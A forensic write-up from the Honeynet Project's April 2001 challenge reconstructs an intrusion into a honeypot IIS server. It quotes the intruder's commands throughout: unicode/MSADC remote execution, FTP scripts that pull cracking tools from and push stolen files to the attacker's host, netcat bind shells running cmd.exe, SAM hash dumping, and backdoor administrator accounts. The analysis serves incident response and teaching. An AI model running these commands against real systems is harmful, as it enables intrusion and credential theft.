Project Honeynet - Scan of the Month - April 2001 Reconstructed Timeline Submitted by: Tom.Vandepoel@ubizen.com ------------------------------------------------- Legend: T (172.161.1.106): the victim of the intrusion, lab.wiretrip.net X (213.116.251.162): the primary source of the intrusion Y (202.85.60.156): the secondary source of the intrusion F (204.42.253.18): ftp.nether.net, indirectly involved in the intrusion Phase 1: probing for vulnerabilities >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> After surfing around a bit, the intruder decides to try the unicode vulnerability. (S)he succeeds in viewing the boot.ini and so (s)he proceeds happily to try the MSADC vulnerability, which allows remote command execution. He uses this ability to create a file. (S)he then uses the unicode vulnerability to verify if this indeed worked. 14:25:22 X:1765 -> T:80 view (unicode) on /guest/default.asp: boot.ini 14:27:08 X:1771 -> T:80 exec (msadc): 'echo werd >> c:\fun' 14:27:15 X:1772 -> T:80 view (unicode): fun Phase 2: transfer of tools onto the target >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Next, the intruder wants to transfer some of his tools onto T, to elevate his/hers privileges further. (S)he does this by using the blind execution capability to compose an ftp client script, piece by piece (through 'echo'). This ftp script, will, when executed, make T retrieve the tools from a remote ftp server. However, the intruder is very clumsy and he has do this over a few times. The first attempt tries to use the server 'ftp.nether.net', but the login fails. The intruder does not know this, and (s)he tries to execute one of the tools, which fails. 14:32:51 X:1778 -> T:80 exec (msadc): creates ftp script ftpcom through 'echo' 14:33:33 X:1791 -> T:80 exec (msadc): 'ftp -s:ftpcom ftp.nether.net' 14:33:34 T:3135 -> F:21 first unsuccessfull login to ftp.nether.net 14:33:50 X:1793 -> T:80 exec (msadc): 'pwdump >> newpass', which fails Retry with the same ftp server: 14:34:00 X:1795 -> T:80 exec (msadc): new ftp script ftpcom2 --- ftpcom2 --- user johna2k hacker2000 put newpass quit --- ftpcom2 --- 14:34:28 X:1803 -> T:80 exec (msadc): 'ftp -s:ftpcom2 ftp.nether.net' 14:34:29 T:3138 -> F:21 second ftp attempt, fails Next, the intruder tries to do this interactively, to the intruder's own machine. At this time, (s)he probably has a sniffer running to see if the connection is actually getting through. Seeing the packets, the intruder is confident that the session is not blocked by a firewall. 14:34:47 X:1808 -> T:80 exec (msadc): 'ftp 213.116.251.162' 14:34:47 T:3139 -> X:21 third, failed ftp connecction Full of new hope, (s)he tries again. This is done 3 times, but fails each time. Confused kiddie that (s)he is, (s)he jumbles up the syntax. 14:36:30 X:1812 -> T:80 exec (msadc): (s)he overwrites the ftp script ftpcom --- ftpcom --- open 213.116.251.162 johna2k hacker2000 get samdump.dll get pdump.exe get nc.exe quit --- ftpcom --- 14:37:22 X:1832 -> T:80 exec (msadc): 'ftp -s:ftpcom' 14:38:29 X:1842 -> T:80 exec (msadc): starts a new ftp script, sasfile --- sasfile --- johna2k haxedj00 get pdump.exe get sampdump.dll get nc.exe quit --- sasfile --- 14:38:42 T:80 -> X:1854 exec (msadc): 'ftp -s:sasfile' 14:40:11 T:80 -> X:1857 exec (msadc): 'open 213.116.251.162' ??? 14:40:13 T:80 -> X:1859 exec (msadc): again recreates script 'sasfile' --- sasfile --- johna2k haxedj00 get pwdump.exe get sampdump.dll get nc.exe quit --- sasfile --- 14:40:25 X:1871 -> T:80 exec (msadc): 'ftp -s:sasfile', probably fails again Frustrated, he switches to unicode command execution. (S)he first copies cmd.exe to the msadc directory, to make his life easier. When (s)he's done this, he continues his antics and finally succeeds in transferring the tools. What I don't understand is that the ftp server uses ASCII mode instead of binary mode, but the tools do work. 14:41:02 X:1874 -> T:80 copy (unicode) cmd.exe to /msadc/cmd1.exe 14:41:09 X:1875 -> T:80 exec (unicode) start creating ftpscript ftpcom --- ftpcom --- open X johna2k haxedj00 get nc.exe get pwdump.exe get sampdump.dll quit --- ftpcom --- 14:42:21 X:1885 -> T:80 exec (unicode): 'ftp -s:ftpcom' 14:42:21 T:3142 -> X:21 ftp transfer of tools, ascii mode: nc.exe, pdump.exe, samdump.dll Phase 3 - Interactive control >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Having transferred netcat onto the system, (s)he forks a netcat listener and connects to it. (S)he then starts to scout around a bit. Apparently, (s)he is accustomed to unix, because (s)he mixes up ls/dir and rm/del. 14:42:42 X:1887 -> T:80 launch (unicode): nc -l -p+6969 -e cmd1.exe 14:42:47 X:1888 -> T:6969 incoming NC cmd.exe session: see nc1.log Phase 4 - Privilege elevation >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Not happy with the interactive logon as IUSR_KENNY, (s)he tries to gather more privileges. Knowing that (s)he can execute commands as SYSTEM through the MSADC hole, (s)he uses that capability to further bootstrap his/her interactive session up to more privileges. First, (s)he tries to use pdump (which he downloaded) to dump the password hashes from the registry, but this apparently fails. 14:43:52 X:1891 -> T:80 exec (msadc): 'samdump >> yay.txt' 14:44:36 X:1893 -> T:80 exec (msadc): 'pdump >> yay.txt' 14:45:55 X:1901 -> T:80 exec (msadc): 'pdump >> c:\yay.txt' 14:46:08 X:1888 -> T:6969 interactive (netcat): 'type yay.txt' 14:47:48 X:1922 -> T:80 exec (msadc): 'pdump >> yay2.txt' 14:47:55 X:1924 -> T:80 exec (msadc): 'net session >> c:\yay2.txt' 14:48:59 X:1888 -> T:6969 interactive (netcat): 'type yay2.txt' Next, (s)he tries to gather more info through 'net commands'. 14:49:54 X:1930 -> T:80 exec (msadc): 'net users >> heh.txt' 14:50:00 X:1932 -> T:80 exec (msadc): 'net users >> c:\heh.txt' 14:50:10 X:1888 -> T:6969 interactive (netcat): 'type heh.txt' Probably struck with a sudden burst of creativity, (s)he leaves a helpful message for the owner of the server. 14:50:51 X:1888 -> T:6969 interactive (netcat): 'echo Hi, i know that this is a lab server, but patch the holes! :-) >>README.NOW.Hax0r' Next, the intruder tries to use 'net' commands to directly change privileges of the IUSR. First, by adding the IUSR/IWAN users to the "Domain Admins" group. 14:51:31 X:1888 -> T:6969 interactive (netcat): 'net group...' 14:53:27 X:1888 -> T:6969 interactive (netcat): 'net users' 14:53:40 X:1940 -> T:80 exec (msadc): 'net localgroup Domain Admins IWAM_KENNY /ADD' 14:54:03 X:1943 -> T:80 exec (msadc): 'net localgroup Domain Admins IUSR_KENNY /ADD' This change in permissions is unsuccessfull, because it is not a local group. Next, the intruder tries to add IUSR/IWAM to the "Administrators" group, which is local. 14:55:45 X:1888 -> T:6969 interactive (netcat): 'net localgroup administrators' --- output --- Members ----------------------------------------------------------------------------- Administrator Domain Admins The command completed successfully. --- output --- 14:56:05 X:1946 -> T:80 exec (msadc): 'net localgroup Administrators IUSR_KENNY /ADD' 14:56:17 X:1948 -> T:80 exec (msadc): 'net localgroup administrators IWAM_KENNY /ADD' 14:56:34 X:1888 -> T:6969 interactive (netcat): 'net localgroup administrators' --- output --- Members ----------------------------------------------------------------------------- Administrator Domain Admins IUSR_KENNY IWAM_KENNY The command completed successfully. --- output --- Tries to run pdump again, presumably with administrator privileges, but fails. 14:58:08 X:1888 -> T:6969 interactive (netcat): 'pdump' For an unknown reason, another account is created, maybe to test the ability of user account creation. 14:59:02 X:1956 -> T:80 exec (msadc): 'net user testuser UgotHacked /ADD' 14:59:18 X:1958 -> T:80 exec (msadc): 'net localgroup Administrators testuser /ADD' Pdump is removed; at this point the intruder probably gives up this method of gaining more privileges. 15:05:27 X:1888 -> T:6969 interactive (netcat): 'del pdump.exe' and 'del samdump.dll' A backup dump of the registry hive is made, through rdisk, but this only succeeds after (s)he gets the syntax right. (S)he needs to run this through MDAC (as SYSTEM) to have enough privileges for this. 15:05:51 X:1888 -> T:6969 interactive (netcat): 'rdisk -s/' 15:06:32 X:1964 -> T:80 exec (msadc): 'rdisk -/s' 15:06:38 X:1966 -> T:80 exec (msadc): 'rdisk -s' 15:06:42 X:1968 -> T:80 exec (msadc): 'rdisk' 15:07:04 X:1970 -> T:80 exec (msadc): 'rdisk -s' 15:07:10 X:1972 -> T:80 exec (msadc): 'rdisk -s/' 15:07:32 X:1974 -> T:80 exec (msadc): 'rdisk /s-' 15:07:50 X:1976 -> T:80 exec (msadc): 'rdisk /s-' 15:08:32 X:1979 -> T:80 exec (msadc): 'rdisk /s-' 15:08:36 X:1981 -> T:80 exec (msadc): 'type c:\winnt\repair\sam._ >> C:\har.txt' 15:08:42 X:1888 -> T:6969 interactive (netcat): 'dir' shows sam._ finally was rewritten C:\WINNT\repair>dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\WINNT\repair 02/04/01 07:07a . 02/04/01 07:07a .. 02/04/01 07:07a 827,392 $$hive$$.tmp 10/13/96 07:38p 438 autoexec.nt 11/26/00 12:34p 2,510 config.nt 02/04/01 07:07a 16,275 default._ 02/04/01 07:07a 14,946 ntuser.da_ 02/04/01 07:07a 5,327 sam._ 02/04/01 07:07a 10,111 security._ 11/26/00 06:54p 50,405 setup.log 02/04/01 07:07a 686,053 software._ 11 File(s) 1,613,457 bytes 1,689,496,576 bytes free (S)he tries to view this binary file, but this messes up the terminal and so (s)he has to kill the session: 15:10:11 X:1888 -> T:6969 first NC session ends (S)he tries to fork a new netcat listener on the same port, but (s)he has problems connecting, probably because the socket is still in use. 15:10:42 X:1987 -> T:80 exec (unicode) 'nc -l -p 6969 -e cmd1.exe' 15:10:46 X:1988 -> T:6969 failed (RST) incoming netcat session 15:10:54 X:1989 -> T:6969 failed again (S)he tries again on another port and succeeds in re-establishing an interactive shell. 15:11:19 X:1992 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 15:11:24 X:1993 -> T:6968 incoming NC cmd.exe session: see nc2.log (S)he copies SAM backup dump he produced earlier to the web root, so (s)he's able to download it. 15:12:22 X:1993 -> T:6968 interactive (netcat): copies c:\har.txt to inetpub 15:12:32 X:1995 -> T:80 get /har.txt (sam._) (S)he tries to delete that file from the web root, both via his interactive shell and through MDAC command execution (as SYSTEM), but this fails. 15:15:23 X:1998 -> T:80 exec (msadc): 'del c:\inetpub\wwwroot\har.txt' 15:15:35 X:2000 -> T:80 exec (msadc): 'del c:\inetpub\wwwroot\har.txt' The intruder looks around some more, but finds nothing of interest and disconnects. (S)he probably fires up l0phtcrack to have a go at the SAM dump file. 15:16:32 T:6968 -> X:1993 second nc session ends (S)he tries to fork a new netcat listener but again has to pick another port: 15:16:41 X:2002 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 15:19:05 X:2007 -> T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe Strangely, this third netcat session origates from a different IP: 15:20:44 Y:1345 -> T:6868 incoming NC cmd.exe: nc3.log The intruder scouts around a bit more and shows particular interest in the "exploits" directories. (S)he also leaves a message for RFP. 15:25:03 Y:1345 -> T:6868 types 'echo best honeypot i've seen till now :) > rfp.txt' Checks up to see if the old message is still there: 15:25:49 X:2022 -> T:80 view (unicode): boot.ini and READ.NOW.hax0r 15:26:06 X:2023 -> T:80 view (unicode): READ.me.NOW.hax0r And for an unknown and to my knowledge useless reason changes the IWAM account password: 15:34:11 X:2082 -> T:80 exec (msadc): 'net user IWAM_KENNY Snake69Snake69' Phase 5 - Bragging time >>>>>>>>>>>>>>>>>>>>>>> Next, we see the attacker creating a file in the web root, called test.txt, containing the text 'This can't be true'. 15:36:02 X:2091 -> T:80 get /test.txt, result "this can't be true" 15:37:46 X:2104 -> T:80 get /test.txt, not modified response Next, we see access to this file from many different IP addresses. My guess is that (s)he's bragging to his/her friends on IRC and referring to the URL http://lab.wiretrip.net/test.txt. 212.187.36.4 15:34 213.46.45.28 15:37 213.48.120.242 15:38 194.126.101.110 15:38 198.142.92.196 15:39 213.93.39.186 15:39 24.43.44.7 15:39 62.153.22.63 15:42 213.245.4.107 15:44 62.153.22.63 15:46 204.137.229.4 15:52 64.219.144.66 15:56 213.64.51.77 15:59 193.253.209.220 16:18 Phase 6 - Cleanup >>>>>>>>>>>>>>>>> After transferring what (s)he probably hopes is a new zer0-day whisker (it is just 1.4, I checked), is about to say bye. 15:50:27 X:2150 -> T:80 exec(unicode): 'copy c:\winnt\system32\cmd.exe cmd1.exe' 15:50:37 X:2151 -> T:80 exec(unicode): construct ftp script ftpcom --- ftpcom --- open X johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit --- ftpcom --- 15:51:29 X:2177 -> T:80 exec (unicode): 'ftp -s:ftpcom' 15:51:29 T:3158 -> X:21 ftp transfer of 'stolen' whisker, ascii For some unknown reason (s)he tries to fork another netcat listener and tries to connect to it, but fails: 15:51:52 X:2178 -> T:80 exec(unicode) nc -l -p 6969 -e cmd1.exe 15:51:55 X:2179 -> T:6969 incoming netcat, but immediately RST 15:52:20 T:6868 -> 202.85.60.156:1345 previous netcat session ends (S)he cleans up the ftp script and leaves the readers project.honeynet to ponder the snort droppings: 15:54:13 X:2187 -> T:80 exec (unicode) del ftpcom